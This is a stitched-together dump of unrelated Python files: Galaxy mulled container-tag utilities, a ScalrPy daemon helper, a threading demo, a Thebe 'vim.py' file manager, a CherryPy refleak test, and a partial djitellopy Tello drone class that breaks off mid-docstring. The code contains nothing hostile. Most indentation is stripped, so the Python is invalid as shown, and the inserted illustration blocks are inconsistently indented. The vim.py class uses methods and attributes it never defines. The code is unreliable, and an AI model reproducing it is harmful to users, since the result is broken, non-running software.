url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=QUAY_IO_TIMEOUT)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=QUAY_IO_TIMEOUT)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
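# Hedged example (illustration only, not part of the original module): fetches
# the version-sorted tags of a biocontainers image from quay.io. This performs
# a live HTTP request; 'samtools' is only an example image name.
def _example_mulled_tags():
    tags = mulled_tags_for('biocontainers', 'samtools')
    log.info("newest samtools tags: %s", tags[:3])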
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag
build_string = "-1"
if '--' in tag:
version, build_string = tag.rsplit('--', 1)
elif '-' in tag:
# Should be mulled multi-container image tag
version, build_string = tag.rsplit('-', 1)
build_number = int(BUILD_NUMBER_REGEX.search(tag).group(0))
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
    elements = sorted(elements, key=lambda tag: tag.version, reverse=True)
return [e.tag for e in elements]
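# Hedged example (illustration only): demonstrates the newest-first ordering
# produced by version_sorted for a few made-up mulled tags.
def _example_version_sorted():
    tags = ['1.2.0--0', '1.3.1--1', '1.3.1--0']
    print(version_sorted(tags))  # expected: ['1.3.1--1', '1.3.1--0', '1.2.0--0']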
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
build = target.build
if build is None and image_build is not None and image_build != "0":
# Special case image_build == "0", which has been built without a suffix
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
build = image_build
suffix += ":%s" % target.version
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1--py_1'
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1'
>>> single_targets = [build_target("samtools", version="1.3.1", build="py_1")]
>>> v2_image_name(single_targets, image_build="0")
'samtools:1.3.1--py_1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
            # tagged version is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def get_file_from_recipe_url(url):
"""Downloads file at url and returns tarball"""
    r = requests.get(url, timeout=QUAY_IO_TIMEOUT)
return tarfile.open(mode="r:bz2", fileobj=BytesIO(r.content))
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = threading.Event()
def progress(self):
while not self.stop.is_set():
print(".", end="")
sys.stdout.flush()
self.stop.wait(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop.set()
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
helper.py
|
import os
import sys
import time
import psutil
import logging
import threading
import logging.handlers
import subprocess as subps
from scalrpy import __version__
def configure_log(log_level=1, log_file=None, log_size=1024*10):
level = {
0:logging.CRITICAL,
1:logging.ERROR,
2:logging.WARNING,
3:logging.INFO,
4:logging.DEBUG,
}
if log_level not in level.keys():
sys.stderr.write('Wrong logging level. Set DEBUG\n')
log_level = 4
log = logging.getLogger('ScalrPy')
log.setLevel(level[log_level])
frmtr = logging.Formatter(
'[%(asctime)s]' + \
'[%s]' % __version__ + \
'[%(module)s]' + \
'[%(process)d]' + \
'[%(thread)d] ' + \
'%(levelname)s %(message)s', datefmt='%d/%b/%Y %H:%M:%S'
)
hndlr = logging.StreamHandler(sys.stderr)
hndlr.setLevel(level[log_level])
hndlr.setFormatter(frmtr)
log.addHandler(hndlr)
if log_file:
hndlr = logging.handlers.RotatingFileHandler(
log_file,
mode='a',
maxBytes=log_size
)
hndlr.setLevel(level[log_level])
hndlr.setFormatter(frmtr)
log.addHandler(hndlr)
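# Hedged usage sketch (illustration only, not part of the original module):
# configures the 'ScalrPy' logger at INFO level (3) with a rotating file
# handler. The log path below is a placeholder.
def _example_configure_log():
    configure_log(log_level=3, log_file='/tmp/scalrpy.log')
    logging.getLogger('ScalrPy').info('logging configured')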
def check_pid(pid_file):
if os.path.exists(pid_file):
pid = open(pid_file).read().strip()
if pid and os.path.exists('/proc/' + pid):
return True
return False
def kill_ps(pid, child=False):
parent = psutil.Process(pid)
if child:
for child in parent.get_children(recursive=True):
child.kill()
parent.kill()
def exc_info(line_no=True):
exc_type, exc_obj, exc_tb = sys.exc_info()
if line_no:
return '%s %s line: %s' % (str(exc_type), str(exc_obj), str(exc_tb.tb_lineno))
else:
return '%s %s' % (str(exc_type), str(exc_obj))
def validate_config(config, key=None):
if type(config) == dict:
for k in config:
validate_config(config[k], key='%s:%s' % (key, k) if key else k)
else:
value = config
assert config != None , "Wrong config value '%s:%s'" % (key, value)
def update_config(config_from=None, config_to=None, args=None):
if not config_from:
config_from = dict()
if config_to == None:
config_to = dict()
for k, v in config_from.iteritems():
if k not in config_to:
config_to[k] = v
if type(v) == dict:
update_config(config_from[k], config_to[k])
elif v != None:
config_to[k] = v
if not hasattr(args, '__dict__'):
return
for k, v in vars(args).iteritems():
if v is not None:
config_to.update({k:v})
class Pool(object):
def __init__(self, factory, validator, size):
self._used = list()
self._free = list()
self._size = size
self._factory = factory
self._validator = validator
self._get_lock = threading.Lock()
self._put_lock = threading.Lock()
def get(self, timeout=None):
self._get_lock.acquire()
try:
if timeout:
time_until = time.time() + timeout
while True:
if self._free:
o = self._free.pop()
o = o if self._validator(o) else self._factory()
self._used.append(o)
return o
elif len(self._used) < self._size:
o = self._factory()
self._used.append(o)
return o
else:
if timeout and time.time() >= time_until:
raise Exception('Pool.get timeout')
time.sleep(0.33)
continue
finally:
self._get_lock.release()
def put(self, o):
self._put_lock.acquire()
try:
if o not in self._used:
return
self._used.remove(o)
if self._validator(o):
self._free.append(o)
finally:
self._put_lock.release()
def remove(self, o):
if o in self._used:
self._used.remove(o)
if o in self._free:
self._free.remove(o)
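# Hedged usage sketch (illustration only, not part of the original module):
# shows the get/put cycle of Pool. The factory and validator below are trivial
# stand-ins; real callers would pool e.g. database connections.
def _example_pool():
    pool = Pool(factory=dict, validator=lambda o: o is not None, size=4)
    obj = pool.get(timeout=5)
    try:
        obj['used'] = True
    finally:
        pool.put(obj)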
def x1x2(farm_id):
i = int(str(farm_id)[-1]) - 1
x1 = str(i - 5 * (i / 5) + 1)[-1]
x2 = str(i - 5 * (i / 5) + 6)[-1]
return 'x%sx%s' % (x1, x2)
def call(cmd, **kwds):
if 'stdout' not in kwds:
kwds.update({'stdout':subps.PIPE})
if 'stderr' not in kwds:
kwds.update({'stderr':subps.PIPE})
p = subps.Popen(cmd.split(), **kwds)
stdout, stderr = p.communicate()
return stdout, stderr
def apply_async(f):
def new_f(*args, **kwds):
pool = kwds.pop('pool')
return pool.apply_async(f, args=args, kwds=kwds)
return new_f
def thread(f):
def new_f(*args, **kwds):
t = threading.Thread(target=f, args=args, kwargs=kwds)
t.start()
return t
return new_f
def create_pid_file(pid_file):
pid = str(os.getpid())
file(pid_file,'w+').write('%s\n' % pid)
def delete_file(file_path):
if os.path.exists(file_path):
os.remove(file_path)
def daemonize(stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
# first fork
pid = os.fork()
if pid > 0:
sys.exit(0)
os.chdir('/')
os.setsid()
os.umask(0)
# second fork
pid = os.fork()
if pid > 0:
sys.exit(0)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(stdin, 'r')
so = file(stdout, "a+")
se = file(stderr, "a+", 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
|
017-thread.py
|
import os,time
from threading import Thread,Lock
database_value = 0
def increase(lock):
global database_value
# lock.acquire()
# local_copy = database_value
# # processing
# local_copy += 1
# time.sleep(0.1)
# database_value = local_copy
# lock.release()
with lock:
local_copy = database_value
# processing
local_copy += 1
time.sleep(0.1)
database_value = local_copy
if __name__ == "__main__":
lock = Lock()
print('Start value', database_value)
thread1 = Thread(target=increase,args=(lock,))
thread2 = Thread(target=increase,args=(lock,))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print('end value', database_value)
print('end main')
|
vim.py
|
import os, sys, json, logging, tempfile
from io import StringIO
#from thebe.core.output import outputController
from multiprocessing import Process
from subprocess import call, check_output
class FileManager:
def __init__(self, target_name):
self.temp_name = ''
self.target_name = target_name
target_ext = self.test_file(self.target_name)
if target_ext == 'ipynb':
            self.ipynb_name = target_name
ipynb_content = self.load_ipynb(target_name)
self.target_name = self.write_temp(ipynb_content)
    def test_file(self, targetLocation):
'''
Return the relevant extension.
If input is incorrect, explain, and quit the application.
'''
if os.path.isfile(targetLocation):
try:
                return self.test_extension(targetLocation)
except ValueError:
logging.info('Please use a valid file extension. (.ipynb or .py)')
sys.exit()
else:
logging.info('Thebe only works with files, not directories. Please try again with a file. (.ipynb or .py)')
sys.exit()
    def test_extension(self, targetLocation):
'''
'''
        targetExtension = targetLocation.split('.')[-1]
if targetExtension=='ipynb':
return 'ipynb'
elif targetExtension=='py':
return 'py'
else:
logging.info('Please use a valid file extension. (.ipynb or .py)')
sys.exit()
    def load_ipynb(self, targetLocation):
'''
Return the ipynb file as a dictionary.
'''
data = {}
with open(targetLocation) as ipynb_data:
data = json.load(ipynb_data)
return data
def open(self):
'''
'''
print('This is the location of the temporary file:\t%s'%(self.temp_loc))
def callVim():
# Open the file with the text editor
# outputController.open()
so = sys.stdout = StringIO()
EDITOR = os.environ.get('EDITOR','vim')
call([EDITOR, self.temp_loc])
# outputController.close()
try:
print('Starting vim process...')
vim = Process(target = callVim)
vim.start()
except KeyboardInterrupt:
print("Terminating vim server.")
vim.terminate()
vim.join()
print("Terminated flask server.")
|
test_refleaks.py
|
"""Tests for refleaks."""
from cherrypy._cpcompat import HTTPConnection, HTTPSConnection, ntob
import threading
import cherrypy
data = object()
from cherrypy.test import helper
class ReferenceTests(helper.CPWebCase):
def setup_server():
class Root:
def index(self, *args, **kwargs):
cherrypy.request.thing = data
return "Hello world!"
index.exposed = True
cherrypy.tree.mount(Root())
setup_server = staticmethod(setup_server)
def test_threadlocal_garbage(self):
success = []
def getpage():
host = '%s:%s' % (self.interface(), self.PORT)
if self.scheme == 'https':
c = HTTPSConnection(host)
else:
c = HTTPConnection(host)
try:
c.putrequest('GET', '/')
c.endheaders()
response = c.getresponse()
body = response.read()
self.assertEqual(response.status, 200)
self.assertEqual(body, ntob("Hello world!"))
finally:
c.close()
success.append(True)
ITERATIONS = 25
ts = []
for _ in range(ITERATIONS):
t = threading.Thread(target=getpage)
ts.append(t)
t.start()
for t in ts:
t.join()
self.assertEqual(len(success), ITERATIONS)
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import cv2 # type: ignore
from threading import Thread
from typing import Optional, Union, Type, Dict
from .enforce_types import enforce_types
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key : int for key in INT_STATE_FIELDS}
state_field_converters.update({key : float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
cap: Optional[cv2.VideoCapture] = None
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
response_receiver_thread = threading.Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = threading.Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
def get_own_udp_object(self):
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise Exception('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
            int: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://@{ip}:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(ip=self.VS_UDP_IP, port=self.VS_UDP_PORT)
return address
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone.
Users usually want to use get_frame_read instead.
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address) # also sets self.cap
self.background_frame_read.start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
            str: response text on success, or the timeout message on failure.
"""
        # Commands sent in quick succession can be ignored by the drone,
        # so wait at least self.TIME_BTW_COMMANDS seconds between commands.
diff = time.time() - self.last_received_command_timestamp
        if diff < self.TIME_BTW_COMMANDS:
            wait_time = self.TIME_BTW_COMMANDS - diff
            self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(wait_time, command))
            time.sleep(wait_time)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
self.last_received_command_timestamp = time.time()
        first_response = responses.pop(0)  # first datum from socket
        try:
            response_decoded = first_response.decode('utf-8')
        except UnicodeDecodeError as e:
            self.LOGGER.error(e)
            # Fall back to a lossy decode so a readable reply is still returned
            response_decoded = first_response.decode('utf-8', errors='replace')
        response = response_decoded.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
        # Commands sent in quick succession can be ignored by the drone, so callers
        # should keep at least self.TIME_BTW_COMMANDS seconds between them.
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if response.lower() == 'ok':
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
        Parses the response to a float
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
tries = 1 + self.retry_count
raise Exception("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'".format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise Exception('Did not receive a state packet from the Tello')
def takeoff(self):
"""Automatic takeoff.
"""
        # Sometimes it takes a long time for the drone to take off and return a successful response.
# So we better wait. Otherwise, it would give us an error on the following calls.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
        Video streaming is supported on all Tellos when in AP mode (i.e.
        when your computer is connected to the Tello-XXXXXX WiFi network).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_control_command("emergency")
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
